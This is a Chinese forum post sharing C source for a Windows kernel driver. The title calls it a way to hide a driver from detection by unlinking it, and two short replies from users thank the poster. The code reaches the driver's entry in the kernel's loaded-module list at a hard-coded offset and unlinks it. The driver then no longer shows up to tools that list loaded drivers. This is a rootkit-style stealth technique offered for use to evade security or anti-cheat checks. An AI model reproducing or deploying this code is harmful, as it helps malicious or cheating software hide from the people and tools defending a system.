C++断链隐藏驱动过检测源码
#include"ntddk.h"
typedef struct _driverdata
{
LIST_ENTRY listentry;
ULONG unknown1;
ULONG unknown2;
ULONG unknown3;
ULONG unknown4;
ULONG unknown5;
ULONG unknown6;
ULONG unknown7;
UNICODE_STRING path;
UNICODE_STRING name;
}driverdata;
#include "Driver.h"
VOID xiezai1(PDRIVER_OBJECT qudongduixiang)
{
KdPrint(("驱动卸载\n"));
}
NTSTATUS DriverEntry(PDRIVER_OBJECT qudongduixiang, PUNICODE_STRING zhucebiao)
{
KdPrint(("驱动入口开始\n"));
driverdata*driverdata1 = NULL;
driverdata1 = *(driverdata**)((ULONG)qudongduixiang + 20);
if (driverdata1!=NULL)
{
*(ULONG*)driverdata1->listentry.Blink = (ULONG)driverdata1->listentry.Flink;
driverdata1->listentry.Flink->Blink = driverdata1->listentry.Blink;
}
qudongduixiang->DriverUnload = xiezai1;
return STATUS_SUCCESS;
}
支持楼主,支持看流星社区,以后我会经常来! 看到这么好的资源真是高兴,楼主辛苦了!
页:
[1]